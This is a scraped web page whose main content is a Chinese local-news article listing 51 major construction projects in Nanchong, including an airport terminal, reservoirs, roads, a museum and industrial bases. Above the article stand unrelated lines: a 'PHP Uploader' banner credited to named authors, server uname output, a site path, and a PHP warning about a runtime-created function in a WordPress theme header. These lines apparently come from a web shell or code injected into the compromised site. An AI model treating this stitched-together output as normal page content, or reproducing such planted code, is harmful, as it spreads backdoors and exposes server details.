PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

明年是南充市委市政府确定的“项目推进年”,南充市在今年12月初就吹响了项目建设的“冲锋号”,并集中开工了51个重大项目,总投资达294.3亿元。这些事关南充未来发展和民生福祉的重大项目有哪些? 市民对此颇为关注,记者于近日采访了南充市发改委。

新建航站楼 建吞吐百万人次机场

  集中开工的51个重大项目,囊括了重大基础设施建设项目、重大产业项目、民生及社会事业项目、生态及环保项目。其中,基础设施建设类项目共有21个,包括南充机场航站区改扩建工程项目,新建10000平方米航站楼,扩建2个机位站坪、现航站楼流程改造、停车场、道路及绿化改造以及其他配套设施建设,建成后年旅客吞吐能力可达100万人次;阆中市五马水库建设项目,建设总库容384万立方米、 正常蓄水位403.2米,相应库容328万立方米。工程由枢纽和渠系两部分组成,枢纽工程包括大坝、溢洪道、取水口、放空洞,渠系工程为五马水库灌溉渠,左干渠、 右干渠设计流量分别为0.31立方米/秒、0.25立方米/秒,长度为13.8公里和8.079公里; 南部县定水至升钟湖至思依公路项目,建设一级公路,总里程51.25公里,路宽24米,设计时速80公里;西充县群德支渠节水改造,改造群德支渠18公里;营山县金鸡沟水库建设项目,新建蓄水1103万方中型水库,可控灌10个乡镇5.68万亩农田,解决2.22万人饮水问题;蓬安县巴南广高速福德连接线,新建二级公路4公里;仪陇县土门至五福公路改造, 改造土门至铜鼓至五福公路,全线长10公里,按照二级公路标准进行改建。

城乡一体化供水 顺庆新建60个供水项目

  在此次集中开工的重大项目中, 民生及社会事业类项目共14个,包括南充市博物馆项目, 该项目位于白土坝与玉带路交叉口两侧,由博物馆、文化馆、文物库房、地下停车场四个子项目组成。 该项目估算总投资5.053亿元;建设总规模47158平方米,其中业务用房(包括地下层设置的演艺厅等部分业务房)38000平方米,地下停车库9158平方米;顺庆区城乡供水一体化工程项目,新建供水工程60处,其中Ⅰ型集中供水站一处,Ⅱ型集中供水站一处,Ⅴ型集中供水站57处,管网延伸1处,统筹解决城乡居民供水问题; 南部县杜家湾水厂二期建设工程,续建二期制水、供水6万立方米/日,迁建取水泵站24万立方米/日,配套取水管道12万立方米/日;仪陇县老君山公园建设项目,集中打造老君山,建占地约420亩的城市休闲公园。

  西充生态环境好, 距离南充中心城区近,素有南充“后花园”之称。在此次集中开工的项目中,有一个占地3000亩,名为“川东北(南充)康养中心”的项目,就建在西充境内。该项目建成后,将是一个集教育、医疗、养生、养老于一体的健康产业园,堪称是高端、大气、上档次的“康养王国”。

推进产业升级 智能家居项目“安家”高坪

  在13个产业类项目中,包括中国重汽南充海乐工业生产基地建设项目,新建液压油缸自动生产线,中重卡汽车液压举升系统自动化生产线, 曼技术车桥生产线,高端液压系统研发中心及生产线,发动机高压油泵(填补国内空白)研发中心及生产线,汽车零部件及结构件生产线。

  顺庆浪潮集团南充云计算中心项目,占地20亩,建云计算中心、大数据中心、云计算展厅、 政务云及智慧交通项目等;高坪富安娜现代智能整体家居建设项目,新建现代智能整体家居研发、生产、销售基地;高坪保税物流中心建设项目,建保税中心,含信息平台业务楼等附属设施。

  此外,还有3个生态及环保类项目,包括南部县城市污水处理二期扩容及提标管网改造工程。

    来源:南充晚报  记者:张维

作者 赵辛

发表回复